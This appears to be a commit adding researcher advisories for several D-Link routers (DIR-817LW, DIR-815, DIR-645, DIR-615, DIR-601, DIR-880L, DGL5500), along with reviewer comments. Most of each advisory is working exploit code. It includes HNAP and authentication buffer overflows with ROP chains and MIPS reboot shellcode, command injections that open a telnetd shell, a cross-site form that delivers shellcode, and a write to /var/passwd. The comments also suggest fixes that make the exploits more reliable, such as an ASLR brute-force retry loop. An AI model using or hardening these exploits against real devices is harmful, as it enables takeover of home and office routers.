buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5 JUNK
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="AAAA" #s7 JUNK
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian
buf+="B"*28+"\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose for v2.02
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley


@ -0,0 +1,106 @@
## Advisory Information
Title: DIR-817LW Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-817LW -- Wireless AC750 Dual Band Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Reboot shellcode in there
buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #s0 # uclibc system address
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0
buf+="C"*36 #
buf+="\x2A\xAC\xD5\xB4" # points to rop3
#buf+="1"*17 # exit payload
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian
buf+="Y"*120 # ROP gadget 2 that loads into $t9
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# Working
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5
buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="AAAA"
buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0
buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # points to rop3
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian shell
buf+="B"*28+"\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose and internal
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';echo "<?phpinfo?>" > passwd1.php;telnetd -p 9090;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
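Review bot: The command-injection PoC at the end of this section connects to `1.2.3.4` while its Host header says `192.168.1.8`, and the two other PoCs in the file target `192.168.1.8` directly, so this one never reaches the device as written. All three scripts would be usable, and consistent with the DGL5500 PoC in this same commit, if the target came from the command line: `target = sys.argv[1]`, `s.connect((target, 80))`, and `s.sendall(buf)` in place of `s.send(buf)` so a partial send of the large auth request is not silently dropped. The summary also speaks of "DIR-815 firmware" although the advisory is for the DIR-817LW, and none of the PoCs record the firmware version the hard-coded ROP addresses were taken from, which the DIR-816L advisory in this commit does provide for its fix.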


@ -0,0 +1,88 @@
## Advisory Information
Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.
## Details
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import urllib
import urllib2
# This exploits the auth_main.cgi with read buffer overflow exploit for v2.02
# prequisite is just to have id and password fields in params
url = 'http://192.168.0.1/authentication.cgi'
junk = "A"*1004+"B"*37+"\x58\xf8\x40\x00" # address of system function in executable
junk+="X"*164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA"
values = "id=test&password=test&test="+junk
req = urllib2.Request(url, values)
response = urllib2.urlopen(req)
the_page = response.read()
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address)
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"*286
buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0)
buf+= "B"*20+"ZZZZ"+"telnetd -p 6778"+"C"*5 # adjustment to get to the right payload
buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Command injection in
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CSRF or any other trickery, but probably only works when connected to network I suppose
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.1", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
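Review bot: The HNAP buffer-overflow PoC in this section is acknowledged by its own trailing comment to not work (`... to test if it works which it does not`), yet the summary presents all three issues as exploitable; the details should mark the HNAP overflow as an unfinished crash PoC, or the non-working ROP chain should be dropped. The command-injection PoC's Host header carries what looks like a public address (`99.249.143.124`) while the socket connects to `192.168.0.1`; that should be replaced by the target variable before publication. As in the sibling DIR-817LW PoCs, `import struct` is unused and `s.send(buf)` should be `s.sendall(buf)`.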


@ -0,0 +1,77 @@
## Advisory Information
Title: Dlink DIR-645 UPNP Buffer Overflow
Vendors contacted: William Brown <william.brown@dlink.com> (Dlink)
Release mode: Released
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-645 -- Whole Home Router 1000 from Dlink. Mainly used by home and small offices.
## Vulnerabilities Summary
I have come across 2 security issues in DIR-645 firmware which allows an attacker on wireless LAN and possibly WAN network to execute command injection and buffer overflow attack against the wireless router. I have provided exploit scripts written in python that give details of the exploits. The buffer overflow does not have a payload at this time, however if you watch the exploit in a debugger, then it can be clearly seen that the payload uses ROP techniques to get to stack payload which is a bunch of C's for now on the stack. It can be replaced with any payload that works on MIPS little endian architecture.
## Details
# Command injection
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + 'test;telnetd -p 9656;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
# Buffer overflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
exploit_buffer = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.1\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";pt;"+"B"*158
exploit_buffer+="C"*50+"Z"*46
exploit_buffer+="\xb4\x67\xb3\x2a"
exploit_buffer+="\xd0\xeb\xb4\x2a"
exploit_buffer+="VVVV"
a
exploit_buffer+="\x7c\xba\xb1\x2a"
exploit_buffer+="K"*16
exploit_buffer+="\x44\x3b\xb0\x2A"
exploit_buffer+="A"*36
exploit_buffer+="\xf0\x5e\xb0\x2A"
exploit_buffer+="H"*16
exploit_buffer+="C"*212+"\r\n" + "1\r\n\r\n"
print "[+] sending exploit_bufferfer size", len(exploit_buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 80))
s.send(exploit_buffer)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown.
* Feb 15, 2015: Vulnerability is patched by Dlink
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
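Review bot: The buffer-overflow PoC has a stray bare `a` on its own line between the `"VVVV"` append and the next `exploit_buffer+=` line; Python evaluates it as a name lookup, so the script dies with `NameError` before anything is sent. Delete that line. The Host header (`10.0.0.1`), the command-injection PoC's Host (`192.168.1.8`) and its connect address (`10.0.0.90`) also disagree, and since the summary admits the overflow carries no payload, the details should label it a crash PoC and say explicitly that the overflow is delivered through the `SOAPAction` header, which is what both requests actually do.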


@ -0,0 +1,58 @@
## Advisory Information
Title: Dlink DIR-615 Authenticated Buffer overflow in Ping and Send email functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-615 -- Wireless N300 router from Dlink. Mainly used by home and small offices.
## Vulnerabilities Summary
I have come across 2 security issues in DIR-615 firmware which allows an attacker using XSRF attack to exploit buffer overflow vulnerabilities in ping and send email functionality.
## Details
# Ping buffer oberflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/ping_response.cgi">
<input type="text" id="html_response_page" name="html_response_page" value="tools_vct.asp&html_response_return_page=tools_vct.asp&action=ping_test&ping_ipaddr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%2A%BF%99%F4%2A%C1%1C%30AAAA%2A%BF%8F%04CCCC%2A%BC%9B%9CEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE%2A%BC%BD%90FFFFFFFFFFFFFFFF%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0c&ping=ping"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
# Send email buffer overflow
----------------------------------------------------------------------------------------------------------------------
<!-- reboot shellcode Big Endian MIPS-->
<html>
<body>
<form id="form5" name="form5" enctype="text/plain" method="post" action="http://192.168.100.14/send_log_email.cgi">
<input type="text" id="auth_active" name="auth_active" value="testy)%3b&log_email_from=test@test.com&auth_acname=sweetBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBIIII%2A%BF%99%F4%2A%C1%1C%30FFFF%2A%BF%8F%04DDDDCCCCBBBB%2A%BC%9B%9CCCC&auth_passwd=test1)&log_email_server=mail.google.com%3breboat%3b%23%23testAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&log_email_port=25&log_email_sender=ses@gmail.com%3brebolt%3b%23%23teYYYY%2A%BC%BD%90AAAAAAAAAAAAtest%3c%06%43%21%34%c6%fe%dc%3c%05%28%12%34%a5%19%69%3c%04%fe%e1%34%84%de%ad%24%02%0f%f8%01%01%01%0cAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAAtestAAAAAAAAAAAAAAAAAA&model_name=test&action=send_log_email&test=test"></td>
<input type=submit value="submit">
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
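Review bot: Neither form records the firmware version the ROP addresses (`%2A%BF%99%F4`, `%2A%C1%1C%30`, ...) were taken from, so a reader cannot tell which DIR-615 revision is affected; the DIR-816L advisory in this commit gives affected and fixed versions and this one should too. Both forms use `enctype="text/plain"` and pack further `&name=value` pairs into one input's value, and the browser sends the `%XX` sequences literally, so the PoC presumably relies on the CGI splitting and URL-decoding the body itself — worth stating, since it is what lets raw shellcode bytes travel through an HTML form. The `%3breboat%3b` and `%3brebolt%3b` fragments in the send-email form look like deliberately misspelt commands left from testing; if they stand for `reboot`, say so, otherwise remove them so the PoC is reproducible.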


@ -0,0 +1,49 @@
## Advisory Information
Title: DIR-601 Command injection in ping functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR601 -- Wireless N150 Home Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 1 security issue in DIR601 firmware which allows an attacker to exploit command injection in ping functionality. The user needs to be logged in. After that any attacker on wireless LAN or if mgmt interface is exposed on Internet then an internet attacker can execute the attack. Also XSRF can be used to trick administrator to exploit it.
## Details
Command injection in dir-601
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
# CMD_INJECTION_INPINGTEST
# Just need user to be logged in and nothing else
buf = "POST /my_cgi.cgi HTTP/1.0\r\n"
buf+="HOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nAccept-Encoding:gzip,deflate,sdch\r\nAccept-Language:en-US,en;q=0.8\r\nContent-Length:101\r\n\r\n"
buf+="request=ping_test&admin3_user_name=admin1;echo admin > /var/passwd1;test&admin4_user_pwd=admin2&user_type=0"+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("IP_ADDRESS", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
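Review bot: The PoC connects to the literal string `"IP_ADDRESS"` and declares `Content-Length:101` for a body that is, by my count, 107 bytes (`request=ping_test...&user_type=0`), so as published it fails on name resolution and, once the address is fixed, the CGI may truncate the injected command at the declared length. Build the body first and derive the header from it: `body = "request=ping_test&admin3_user_name=admin1;echo admin > /var/passwd1;test&admin4_user_pwd=admin2&user_type=0"` followed by `"Content-Length:%d\r\n\r\n" % len(body)`, and take the target from `sys.argv[1]`. The comment says the user must be logged in, but the request carries no cookie or credential, so presumably the device ties the session to the client IP; that assumption should be stated, since it decides whether the XSRF route mentioned in the summary works.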


@ -0,0 +1,73 @@
## Advisory Information
Title: DIR-880L Buffer overflows in authenticatio and HNAP functionalities.
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins.
## Details
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Currently the address of exit function in libraray used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
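Review bot: The summary says the exploit must be sent 200–500 times to beat ASLR on this ARM device, but both PoCs open one socket and send once, so as written they do not perform the retry the advisory depends on. The auth PoC should wrap connect/send in a loop that tolerates connection errors (the advisory itself notes the crashing process is separate from the web server), and `s.send` should become `s.sendall`; the loop below also needs `import sys` alongside the existing imports. Comments such as `R6 with crap` should say what the slot is (`R6 is unused by the gadget; filler`).
```python
# … unchanged: buf construction …
attempts = int(sys.argv[2]) if len(sys.argv) > 2 else 500
for i in range(attempts):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 80))
        s.sendall(buf)
        s.close()
    except socket.error as e:
        print "[-] attempt %d failed: %s" % (i, e)
```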


@ -0,0 +1,65 @@
## Advisory Information
Title: DGL5500 Un-Authenticated Buffer overflow in HNAP functionality
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DGL5500 -- Gaming Router AC1300 with StreamBoost. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 1 security issue in DGL5500 firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilitiy in hnap functionality. Does not require any authentication and can be exploited on WAN if the management interface is exposed.
## Details
# HNAP buffer oberflow
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Although you can access this URL unauthenticated on WAN connection which is great but need a good shellcode. buffer overflow in check_hnap_auth
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+="AAAA" #s0
buf+="\x2A\xBF\xB9\xF4" #s1 ROP 2
buf+="\x2A\xC1\x3C\x30" #s2 sleep address
buf+="DDDD" #s3
buf+="\x2A\xC0\xEB\x50" #s4 ROP 4 2AC0EB50
buf+="\x2a\xc0\xf3\xe8" # Retn address 2AC0F3E8 ROP1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # 36 bytes of gap
buf+="\x2A\xBC\xDB\xD0" # ROP 3
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
